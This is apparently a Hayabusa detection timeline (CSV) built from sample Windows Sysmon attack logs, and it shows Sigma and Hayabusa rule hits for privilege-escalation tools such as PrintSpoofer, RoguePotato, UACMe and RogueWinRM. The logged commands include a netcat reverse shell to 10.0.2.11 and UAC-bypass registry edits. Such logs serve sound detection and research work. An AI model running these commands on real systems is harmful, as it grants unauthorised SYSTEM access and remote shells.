2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object
Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 
747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 
10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 